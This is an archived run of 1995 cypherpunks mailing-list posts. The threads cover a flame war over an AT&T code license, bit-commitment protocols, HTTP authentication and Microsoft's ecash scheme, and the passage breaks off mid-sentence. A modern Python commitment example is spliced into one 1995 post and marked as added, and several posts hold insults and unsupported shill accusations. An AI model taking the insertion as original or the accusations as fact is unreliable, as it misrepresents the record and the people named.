It seems that .pm has to be paranoid since he doesn't recognize integrity. 
Maybe he is the famous net loon LD?

However, keep up the good work.

Dan 

On Tue, 19 Dec 1995, Matt Blaze wrote:

> Perry wonders:
> 
> > What I want to know is, why are you doing this? Are you trying to
> > start a flame war? Are you just an asshole? Are you Detweiler? What's
> > the motive?
> 
> I must admit I don't quite get it, although I think there are people
> who really can't distinguish between a person and a person's employer, and
> who believe that the entire world is a black-and-white battle between
> good and evil.
> 
> Jeff Weinstein got treated rudely back during the feeding frenzy
> where everyone hated Netscape because he works for Netscape.
> 
> Brian Davis got treated rudely when he first joined the list because
> he works for the government as a federal (?) prosecutor.
> 
> I get treated rudely from time to time because I work for AT&T.
> 
> It doesn't bother me, especially when it comes from an anonymous source who
> for all we know might earn his or her keep by advertising the joys of
> smoking cigarettes to small children or by testing the toxic effects of
> new cosmetics on cute, furry animals.  I figure it all just comes with
> the turf.  At least I don't get blood thrown on me by protestors the way
> people who work in animal testing labs do...
> 
> -matt
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 19 Dec 95 14:30:34 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <199512192232.WAA18554@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


AT&T Spokesman Matt Blaze writes:
blah blah
>There are (basically) no restrictions on the use or distribution
>of the (very simple) code.

This is simply untrue. Read the fine print in the file. Use this code
and you owe them big. They'll "reach out and touch" you big time.
If they were serious, they'd gpl it.

>Get it from:
>	ftp://research.att.com/dist/mab/quantize.shar
>
>The quantize package is also part of Jack Lacy's cryptolib package
>(watch this space for details).

I don't understand why this group continues to tolerate these blatantly
commercial messages from att (and netscape.) (The message is
really just an ad for the cryptolib product, as it says). I've also said
this b4 but I'll say it again: why would anyone in their right mind trust
binary code from att after the clipper fiasco.

And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
cypherpunks, when they are so clearly just working us for their
corporate interests? I wonder how much they get paid to monitor this
list?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Tue, 19 Dec 95 19:36:57 PST
To: perry@piermont.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com>
Message-ID: <m0tSFM0-0002StC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger enscribed thusly:

> ECafe Anonymous Remailer writes:
> [Lots of garbage slandering Matt Blaze, who's about as close to being
> a dyed-in-the-DNA cypherpunk as you can get.]

	Yeah!  Really!  We're talking about Matt "Honey I broke the
chip" Blaze here.  Single handedly did more damage to the clipper
chip than any other individual or group!

> What I want to know is, why are you doing this? Are you trying to
> start a flame war? Are you just an asshole? Are you Detweiler? What's
> the motive?

	Perry, I liked your reaction to the last chump like this
much better.

	We should find out what drugs they are taking and where we can
buy some!  They are obviously VERY good considering that they no longer
have any connection with reality.

	I'm just impressed that they can manage to find their keyboard
with the hallucinations they're having!

> .pm

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@SmallWorks.COM (Jim Thompson)
Date: Tue, 19 Dec 95 21:23:45 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <9512200523.AA24870@hosaka.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



>AT&T Spokesman Matt Blaze writes:
>blah blah
>>There are (basically) no restrictions on the use or distribution
>>of the (very simple) code.
>
>This is simply untrue. Read the fine print in the file. Use this code
>and you owe them big. They'll "reach out and touch" you big time.

You're wrong.

Direct from the shar file:

X/*
X * Simple Unix time quantization package
X * {mab,lacy}@research.att.com
X * v1.0 - 12/95
X *
X * WIN32 port v0.1 fod@brd.ie 12/95
X *
X * TESTED ONLY UNDER SUNOS 4.x and BSDI 2.0.
X *
X * WIN32 port TESTED ONLY UNDER WINDOWS '95
X *   (further testing recommended)
X *   Requires Winmm.lib
X *
X * This is unsupported software.  Use at own risk.
X * Test carefully on new platforms.
X */
X/*
X * The authors of this software are Matt Blaze and Jack Lacy
X *              Copyright (c) 1995 by AT&T Bell Laboratories.
X *
X * WIN32 port by Frank O'Dwyer
X *              Copyright (c) 1995 by Rainbow Diamond Limited
X *
X * Permission to use, copy, and modify this software without fee is
X * hereby granted, provided that this entire notice is included in all
X * copies of any software which is or includes a copy or modification
X * of this software and in all copies of the supporting documentation
X * for such software.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR
X * IMPLIED WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T
X * NOR RAINBOW DIAMOND LIMITED MAKE ANY REPRESENTATION OR WARRANTY
X * OF ANY KIND CONCERNING THE MERCHANTABILITY OF THIS SOFTWARE OR
X * ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */

Nothing, but nothing in there restricts you from doing anything you like
with the software, as long as you provide attribution.

>If they were serious, they'd gpl it.

Maybe they don't like the terms of the gpl?  Maybe they don't want
to restrict *you* to having to give it away?  (And before you jump
my ass for being anti-gnu, go check the various GNU sources for work
I've submitted in the past.)

>I don't understand why this group continues to tolerate these blatantly
>commercial messages from att (and netscape.) (The message is
>really just an ad for the cryptolib product, as it says). I've also said
>this b4 but I'll say it again: why would anyone in their right mind trust
>binary code from att after the clipper fiasco.

Is this where we point out that it was Young Master Blaze who pointed out the
technical failure in Clipper?

>And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
>cypherpunks, when they are so clearly just working us for their
>corporate interests? I wonder how much they get paid to monitor this
>list?

"Cypherpunks write code."  (Where is yours?)

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 19 Dec 95 20:41:51 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951219233125.26112A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, Perry E. Metzger wrote:

> ECafe Anonymous Remailer writes:
> [Lots of garbage slandering Matt Blaze, who's about as close to being
> a dyed-in-the-DNA cypherpunk as you can get.]
> 
> What I want to know is, why are you doing this? Are you trying to
> start a flame war? Are you just an asshole? Are you Detweiler? What's
> the motive?

What _I_ want to know is, is this a troll from the same person who posted 
the RSA patch for the cryptolib, and is now slandering it.

(Re: the patch... it seemed to work on my copy, it passed the test... but 
NOTHING uses the damn library that I can just test it with)

More 'anonymous' persons should choose to be pseudonymous...

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Dec 95 00:47:20 PST
To: cypherpunks@toad.com
Subject: on web standards: sent to Markoff
Message-ID: <199512200844.AAA24193@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



here's a quickie rant about software standards sent to Markoff, precipitated 
by his recent column on Berners Lee & the Web. please help kill the urban 
legend I refer to in this letter.

------- Forwarded Message

Subject: tim berners lee etc.
Date: Wed, 20 Dec 95 00:39:44 -0800
From: "Vladimir Z. Nuri" <vznuri@netcom.com>


I read your recent article on Tim Berners Lee. there is a misconception
in the article that annoys me and that I have seen you/others repeat
elsewhere. the following myth is:

COMPANIES SET STANDARDS.

this is not really true. in the short term, companies can set whatever
"standards" they like. but in the long term, the *market* decides what
standards are acceptable. an example of this was IBM: they set various
standards until the market decided that the "standards" they were setting
were not acceptable. they became their own worst enemy. no amount of
shovelling their ideas down consumers' throats via million dollar ad
campaigns or sales pressure changed the basic reality
of what the market wanted. even though "microchannel" may have been
technically superior, consumers consistently decided the proprietary
price of the architecture was not worth the extra economic burden
to obtain it.

you and others are continually reiterating and reinforcing this myth
in regards to web software in your writing. you talk about 
various companies as if they
could somehow seize various standards for their own and exclude other
companies (Netscape's supposed proprietary web "standards" are an example).
this is fallacious for the reason I outlined above. the market
may not tolerate this exclusivity, and particularly in the area of 
computer software and hardware this has been shown emphatically so.

furthermore, the idea that companies can legislate their own web
standards is particularly ludicrous. it is true that netscape has
added their own "extensions" that their own browser understands and
other browsers initially do not. but nothing prevents other companies
from immediately incorporating these "enhancements" so that they
are recognized by their own software. in fact this is trivial to do
so in many cases (e.g. one of these so-called "enhancements" is blinking
text in web pages). so the idea that a single web company can somehow
monkeywrench the standards process by introducing new ideas is 
absurd and completely ignorant of reality.

in fact this rapid "standard" fluctuation is the heart of innovation.
it is true that the web standard is fluctuating very rapidly right
now, but that is not evidence of companies trying to seize the standard
for their own: instead it is the chief sign of dynamic and rapid innovation.

I urge you to read Bill Gates's recent book. he addresses this continual
myth that people yammer about, namely the idea that individual companies
can set exclusive or proprietary standards. a company standard is in
fact a sort of temporary whirlpool in time: it will exist only so
long as the forces surrounding it support it. a single company can
temporarily create an illusion that their standards are the only ones
available, but the market may eventually decide that their standard is
not appropriate. Microsoft would crumble in a short amount of time if
they failed to deliver what the market demands, and Gates reiterates
this theme.

it is tempting to think of Microsoft or Netscape as large behemoths
that "drive the market". this is true in the short term but 
in truth over the long term the market drives these companies,
and they lose market share if they become irrelevant. it is useful
to look at one company as a focus of market forces, not the determinant
of them.

in my opinion the idea that various companies are in control of the
market is not only erroneous but highly dangerous. it leads to the
view that the government has to step in to promote "fair competition"
or "legislate standards". these approaches are usually total failures
because they completely neglect the true nature of the innovation of
ideas, something that is expressed quite tangibly and viscerally in
software development, but this simple point various people still
utterly fail to grasp.

it's quite dramatic to write about single companies such as Microsoft
or Netscape as if they have tremendous power and influence over
the industry. various companies have found however that this 
influence is highly fleeting if they are not in tune with market
currents. companies are subservient to the market, not vice versa.
please strive to recognize this basic fact in your future writing.


p.s. I am willing to work this into a letter to the editor if you are
willing to publish it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Wed, 20 Dec 95 01:01:24 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: cyphernomicon FTP site?
In-Reply-To: <m0tSH6U-00090OC@pacifier.com>
Message-ID: <199512200858.AAA26214@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 04:18 PM 12/19/95 -0500, you wrote:
> >Anyone know where I can FTP a full copy of the cyphernomicon?
> >
> 
> I'm interested in this too.  I really HATE those silly HTML documents that
> can't (or, at least, I haven't yet figured out how) be downloaded in one
> swell foop.  
> 
    When using lynx from my shell account, I like to grab the whole
    thing at once at net speed.  Just now this took 65 seconds for
    the 1.28 Mb with obvious pauses ( I've seen it twice as fast).

    http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ 

   



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 95 23:34:39 PST
To: "Vinod Valloppillil" <cypherpunks@toad.com
Subject: Re: cyphernomicon FTP site?
Message-ID: <acfcfac90d021004d8b1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:18 PM 12/19/95, Vinod Valloppillil wrote:
>Anyone know where I can FTP a full copy of the cyphernomicon?

It would help if you said what you'd tried. For example, have you tried
ftp.netcom.com in the directory pub/tc/tcmay? There you will find several
versions, including compressed versions.

This can be hard to access, due to crowding, but can eventually be gotten to.

It has also been placed at other locations, according to reports here.
Check the archives.

Personally, I hear that even the author prefers the HTML version at
http://www.oberlin.edu/~brchkind/cyphernomicon/.

Anybody who plans to download the entire linear file and then print it out
must be missing a bits in his shift register.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Dec 95 16:07:44 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512200007.BAA29596@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>I would think that ISPs (and even commercial online services) would
>prefer that their customers use strong crypto because it's less for
>them to worry about ("Are they really sending pornography or death
>threats though our network?").

While most ISP's may not want to be responsible for monitoring 
transmissions, check out a portion of an agreement from mine. 
(I haven't and won't sign such an agreement, may therefore be 
terminated at month's end.)

"4.1  PCIX may elect to electronically monitor any and all 
traffic which passes over our Wide Area Network.  This 
monitoring may include public as well as private communications 
and data transfers from our Members and to our Members as well 
as any and all communications and data transfers to and from 
any other internet sites. ....  The monitoring and disclosure 
activities of PCIX may negate the privacy protections which 
the Member would otherwise enjoy under federal and state law, 
including the Electronic Privacy Communications Act.  Member 
specifically agrees that PCIX may do so and Member understands 
that he or she is giving up privacy rights which he or she 
would otherwise be entitled to under the law."

Hope this isn't the start of a trend!

groundfog@nym.gondolin.org








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 19 Dec 95 22:37:28 PST
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <199512200638.BAA34608@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Phill <hallam@w3.org> wrote:

<snip>

>It is very strange the way that "Libertarians" are so able to turn all
>rights into property rights. Thus freedom of speech becomes freedom to have
>influence on the political process in direct proportion to wealth.

And what do you propose? Speech in proportion to ability to bitch???

<snip>

>When the Web becomes as ubiquitous as the telephone we 
>will still see inequalities of power, the homeless and the poor will still
>be underrepresented.

Let me guess, somehow the government can cure this?

>But that situation must be judged against our own where the 
>political process can be bought and traded as if it were any other form of 
>commodity.
>
>It is not simply an issue of money, it is an issue of national security. If a 
>foreigner were to control the majority of the media there would be a significant 
>threat to the national interest. This threat has been realised in the UK with 
>the coming to power of Rupert Murdoch. Fortunately his influence on the US 
>political scene has thus far been minor. In his own country he has brought down 
>the government more than once.

So what??? He gives us "The Simpsons" and "Married, With Children!"
[IMO] Rupert has done more for humor than any humor-impaired liberal
has ever done!

>>And as far as "prevent the political process from being owned by the rich" 
>>goes, there have been brief exceptions over the last 5000 years in which
>>the less-rich have overthrown the rich, but campaign finance laws have
>>almost never kept the rich or the politicians from helping each other out.

So??? I'm fighting them, are you???

>In UK politics the influence of an individual's money is limited to influencing 
>one party. Even that is done behind closed doors. The other major parties both 
>limit the size of individual contributions to a constituency party to a 
>relatively nominal sum. $5000 is a huge sum in UK politics.

They probably bribe in accordance with the marketplace. Big deal.

>>I also don't believe freedom of speech should be limited by national 
>>boundaries.
>
>Nor do I. But I only vote in one country. If we take the question outside the US 
>it would not on the whole be a good thing if the Prime Minister of Tobago (say) 
>were provided with a campaign contribution of $1M by a foreign company with an 
>interest in strip mining the entire island. Similarly it would be a bad thing if 
>Colombian drug lords were to make massive contributions to politicians committed 
>to continuing the prohibition on drugs.

They do, right now. Do you think the Libertarians have gotten any
contributions from the drug-smugglers??? If so, please tell me what you
are on and where I can get some. Otherwise, kwitcherbitchin.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

-----END PGP SIGNATURE-----
----------------------------------------------------------------------
Regards, Jim Ray
http://www.shopmiami.com/prs/jimray
"Thank God we don't get all the government we pay for." -- Will Rogers
[Back when we paid for (and got) a  _lot_  less government.]
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  <liberty@gate.net>  IANAL
-----------------------------------------------------------------------
Help Phil! e-mail zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Dec 95 01:27:32 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Bit Commitment Query
In-Reply-To: <30D7A993.3F54@maths.su.oz.au>
Message-ID: <199512200927.EAA27328@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


robbie gates, apprentice algebraist writes:
> In essence, why doesn't the following work:
> 
> 1. Alice has a bit b.  She picks a random bit string R and sends Bob
> 	h(R,b)
> 
> 2. To verify, she tells Bob R and b.
> 
> Assuming Bob knows b is a single bit, how does Alice cheat without needing
> to produce hash collisions for h.

Hmmm. I can't see anything wrong with your reasoning, and I too am puzzled by
Schneier's comment about Alice needing to send R_1 to Bob initially. I hope
someone else will give a more authoritative answer.

Your question prompted me to study the other bit commitment protocols in
_AC_ a bit more closely (pun not intended). Schneier observes that the
b.c. with hash function protocol you cited has an advantage over the b.c.
protocol with symmetric encryption he describes (v.1,pg.72). Namely, the
hashing b.c. protocol only needs one-way communication after the protocol 
negotiation. 

It seems to me that the encryption b.c. protocol he gives can easily be
modified to require only one-way communication (Alice-->Bob). The modified
protocol goes like this:

[0] Alice has a bit b, and generates a secret key K and a random string R.

[1] Alice --- E_K(R, b), R --> Bob

[2] Alice wants to reveal her committed bit.

[3] Alice --- K --> Bob

[4] Bob computes D_K(E_K(R, b)) = (R, b) and checks the value of b (or cries
    foul if R has the wrong value)

This can't possibly be a new idea, but I don't know the literature well enough
to give a reference. Of course, the other possibility is that this protocol
is broken. :}  If E is a good encryption algorithm, it should be hard for
Alice to find K_2 s.t. D_K_2(E_K(R, b)) = (R, 1-b), even though she
gets to choose R. 

Comments ?  Why might we prefer to use the encryption b.c. protocol in 
Schneier to something like the above ?

-Futplex <futplex@pseudonym.com>			R.I.P. Brian Jones
(apprentice cryptographer)
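
Added example, not part of the original post: a Python sketch of both protocols discussed above, the quoted h(R, b) commitment and steps [0]-[4] of the modified protocol. E is instantiated as a one-time pad, which is this example's assumption, chosen to show that secrecy of E alone does not make the commitment binding; the optional key hash `hk` is also an addition of this example.

```python
import hashlib
import hmac
import secrets


def _h(r: bytes, bit: int) -> bytes:
    # h(R, b): the bit is always the final byte, so R || b parses unambiguously.
    return hashlib.sha256(r + bytes([bit])).digest()


def hash_commit(bit: int):
    """Step 1 of the quoted protocol: Alice sends h(R, b) and keeps R."""
    r = secrets.token_bytes(32)
    return _h(r, bit), r


def hash_verify(commitment: bytes, r: bytes, bit: int) -> bool:
    """Step 2: Bob recomputes h(R, b) from the R and b Alice reveals."""
    return bit in (0, 1) and hmac.compare_digest(commitment, _h(r, bit))


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def enc_commit(bit: int, key_check: bool = False):
    """Steps [0]-[1] with E = one-time pad (assumption of this example).

    Returns (message sent to Bob, key K kept by Alice). With key_check=True
    the message also carries SHA-256(K), which pins Alice to one key.
    """
    r = secrets.token_bytes(16)
    key = secrets.token_bytes(len(r) + 1)
    msg = {"c": _xor(r + bytes([bit]), key), "r": r}
    if key_check:
        msg["hk"] = hashlib.sha256(key).digest()
    return msg, key


def enc_open(msg: dict, key: bytes):
    """Steps [3]-[4]: Bob decrypts with K; returns b, or None to cry foul."""
    if len(key) != len(msg["c"]):
        return None
    if "hk" in msg and not hmac.compare_digest(
            msg["hk"], hashlib.sha256(key).digest()):
        return None
    plain = _xor(msg["c"], key)
    r, bit = plain[:-1], plain[-1]
    if r != msg["r"] or bit not in (0, 1):
        return None
    return bit


def flip_key(key: bytes) -> bytes:
    """K_2 for the one-time pad: D_K2(E_K(R, b)) = (R, 1-b), R unchanged."""
    return key[:-1] + bytes([key[-1] ^ 1])


if __name__ == "__main__":
    c, r = hash_commit(1)
    print("hash opens as 1:", hash_verify(c, r, 1),
          "| as 0:", hash_verify(c, r, 0))
    msg, k = enc_commit(0)
    print("pad opens as:", enc_open(msg, k),
          "| with K_2:", enc_open(msg, flip_key(k)))
    msg, k = enc_commit(0, key_check=True)
    print("pad + key hash with K_2:", enc_open(msg, flip_key(k)))
```

The one-time pad hides b perfectly yet lets Alice open either way, so the "hard to find K_2" property has to come from the cipher binding the ciphertext to a single key, or from an explicit commitment to K as in the `hk` variant.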



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Wed, 20 Dec 95 03:57:41 PST
To: cypherpunks@toad.com
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
Message-ID: <2.2b9.32.19951220115525.0069303c@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:46 PM 12/18/95 -0800, Rich Graves wrote:
>Except for the bit about the file not being deleted after quitting
>Netscape (which is Bad), this is old news. This is why security-conscious
>sites like banking.wellsfargo.com ask for passwords in an SSL-encrypted
>form rather than via simple browser authentication. 

On a related note, how does Netscape (or HTTP in general) authenticate using
the password? My best guess, without a sniffer, is (making up error codes as
I go along, but you get the point):

        Browser Sends: GET ...
        Server Replies:  4xx (3xx? 2xx?) Sorry. I need authentication.
        Browser (after querying user): GET along with user-name/password
        Server: ...whatever the page is...

Given that, what allows me to go on and see other (protected) pages on the
same server without being re-prompted? Is it a similar conversation to the
one above or does the browser broadcast the password on every subsequent
request? I cannot ascertain the behavior by going to another site protected
by a different password. Either one is possible. What I'm hoping happens
with multiple sites is:

        Browser Sends: GET ...
        Server Replies:  4xx (3xx? 2xx?) Sorry. I need authentication.
        Browser (after querying user): GET along with user-name/password
        Server: ...whatever the page is...
     (1)Browser (to a different server): GET ...
        Server2:  4xx (3xx? 2xx?) Sorry. I need authentication.
        Browser: user-name/password cached from before
        Server2:  4xx (3xx? 2xx?) Sorry. That's not it. I need authentication.
     (2)Browser (after re-querying user): GET user-name2/password2
        Server: ...whatever the page is...

The broadcast option would change (1) to (2) above to:

     (1)Browser (to a different server): GET along with user-name/password
        Server2:  4xx (3xx? 2xx?) Sorry. (That's not it?) I need authentication.
     (2)Browser (after re-querying user): GET user-name2/password2

Admittedly, the second one is more optimal, but does this mean it would
broadcast the user/passwd to every site? Even the first option winds up
sending wrong passwords to other servers. Does the browser re-prompt if it
detects a new IP address or a different sub-tree of the same server?

Anyway, lots of conjecture (sp?) here. Does anyone know how it really works
or can point me at a reference? Thanks.

					Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Wed, 20 Dec 95 04:23:47 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <2.2b9.32.19951220122140.00684794@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 12/19/95 GMT, ECafe Anonymous Remailer wrote:
>
>And why do we tolerate Jeff Weinstein and Matt Blaze calling themselves
>cypherpunks, when they are so clearly just working us for their
>corporate interests? I wonder how much they get paid to monitor this
>list?

Matt, if you're getting paid to read this list, I want a new contract.

					Karl A. Siil
					AT&T BCS Advanced Projects
					908-949-4037
					908-949-8978 (FAX)
					karl@cosmos.cosmos.att.com
					!karlsiil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Dec 95 09:06:26 PST
To: cypherpunks@toad.com
Subject: Re: cyphernomicon FTP site?
Message-ID: <2.2b7.32.19951220170717.008dcd74@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 AM 12/20/95 -0800, you wrote:
>At 9:18 PM 12/19/95, Vinod Valloppillil wrote:
>>Anyone know where I can FTP a full copy of the cyphernomicon?
[Much deleted]
>Anybody who plans to download the entire linear file and then print it out
>must be missing a bits in his shift register.

There are reasons to want a non-html version.  The best being uploading to
your favorite text-oriented BBSes.  (Or crypto-oriented BBSes.)  Not
everyone has access to the web.  (Yes, I know it is blasphemy...)

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 20 Dec 95 07:44:48 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <2.2b9.32.19951220122140.00684794@cosmos.cosmos.att.com>
Message-ID: <i4VegD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Karl A. Siil" <karl@cosmos.cosmos.att.com> writes:
> At 10:32 PM 12/19/95 GMT, ECafe Anonymous Remailer wrote:
> >
> >And why do we tolerate Jeff Weinstein and Matt Blaze calling themselves
> >cypherpunks, when they are so clearly just working us for their
> >corporate interests? I wonder how much they get paid to monitor this
> >list?
>
> Matt, if you're getting paid to read this list, I want a new contract.

Karl, are you an unpaid volunteer at AT&T, or do you quit your job every
time you read your e-mail?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 20 Dec 95 09:21:19 PST
To: rah@shipwright.com
Subject: Re:  King Kong Does e$
Message-ID: <199512201719.JAA12291@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Bob Hettinga for typing that long message about the Microsoft
"ecash" scheme.  That is some nimble note-taking.  I have a few comments
on the scheme as Bob presented it, and as it compares to Digicash.  I
will follow up with some commentary about the politics involved.

>         Customer chooses secret s, serial number n, n=h(s) and amount.
>         Customer pays bank (by any method) the amount of the desired banknote
>         bank signs serial number and amount
>         Transaction may be anonymous (physical cash purchase at bank) pick
>         serial number, bank uses private signature to sign the serial number.
>[...] 
> How is it used for payment
>         Payer simply gives bank note to payee by handing over the secret
>         payee immediately exchanges the banknote for new ones anonymously, if
>         desired
>         Old banknote is now invalid, since bank has its secret; hence payer
>         can't respend it
>         If the bank note is already invalid, bank rejects exchange and informs
>         payee.
>         "In effect, these are disposable banknotes"

The withdrawal protocol has some similarities to online Digicash ecash.
In that system, you choose a random number s, calculate a one way
function h(s), and get that signed by the bank.  Unlike in the Microsoft
scheme, blinding is used for the signature.  I imagine Microsoft avoids
blinding because of the patent situation, and possibly due to legal
concerns about anonymity (more on this below).  With Digicash, the coin
is then the pair s, SIGN(h(s)).  This is then given to the shop as
payment.  It can check the bank's signature, but that is not enough;
being an online scheme, it must also turn the coin in at the bank to
prevent double spending.  The bank checks the signature and that the coin
is well formed to accept it.

The Microsoft scheme is like an unblinded version of this.  The bank
simply signs h(s) and gives that to the customer.  This allows a
simplification in the spending.  Instead of passing s, SIGN(h(s)), it is
enough just to pass s.  The payee gives this to the bank (since this is
an online system), which given s can calculate h(s) and check this
against a list of all valid coins.  It knows the valid coin numbers
because it saw them when it signed them (unlike with Digicash).  So there
is a slight space savings in the spending protocol.

It is also not necessary for the messages to and from the bank to be
encrypted during the withdrawal protocol; neither knowing h(s) nor
SIGN(h(s)) will allow an attacker to spend the coin, since he doesn't
know s.  A similar thing is true of DigiCash, though, where the blinded
pre-signed or signed coins are useless to an attacker since he doesn't
know the blinding factor.

The big problem then with the Microsoft system is that it is not
anonymous.  As a result, it is technically not electronic cash, at
least as the word is used in the literature.  However we are seeing so
many proposals like this, all of them wanting to capitalize on this
magic word "cash", that I suppose the definition has to be considered
to be shifting.  In the new usage, virtually any payment system can be
called cash if there is some way that users can be anonymous in using
it.  And since by allowing anonymous accounts virtually any payment
system can do this, the word is becoming meaningless.

The problem I see in practice with using their cash anonymously is how to
buy it.  If I have an account with the Bank of Microsoft, and I withdraw
some "mcash", deducting it from my account balance, that mcash will be
linkable to my account when I spend it.  In order to be anonymous I have
to buy the cash anonymously.  I can walk into the local bank with a
floppy and some dollar bills, but that is not practical in general.  I
could use mcash to buy some more mcash, but even if the second
transaction is anonymous, the bank knows that I was the one who withdrew
the first set of mcash, so it can link me to the second set when it is
spent.

The only good solution I can see is to use Digicash ecash to anonymously
buy Microsoft mcash, but I doubt that that is what they had in mind!

Frankly, what I see in this message is another example of something which
is starting to become common: marketing to cypherpunks.  In a way it is a
very positive sign, that our views and concerns are becoming so well
known and widespread that companies like Microsoft and Netscape are doing
their best to keep on the good side of people like us, who are concerned
about strong privacy and security.  In some ways our attitudes are
becoming dominant on the net, thanks to the many excellent writers here,
as well as magazines like Wired, and groups like the EFF and other
interest groups.

But this influence is making us a target of companies who know that
gaining our approval, or at least avoiding our criticism, is important
for success on the net.  In many cases, such as the recent flap over
Netscape's attitudes towards key escrow, I detect a whiff of two
sidedness, in which one attitude is presented for the benefit of
government and law enforcement interests, while another posture, more
acceptable to cypherpunks, is adopted on the net.  With Microsoft, they
use the magic word "cash" a great deal, in my view hoping that we will
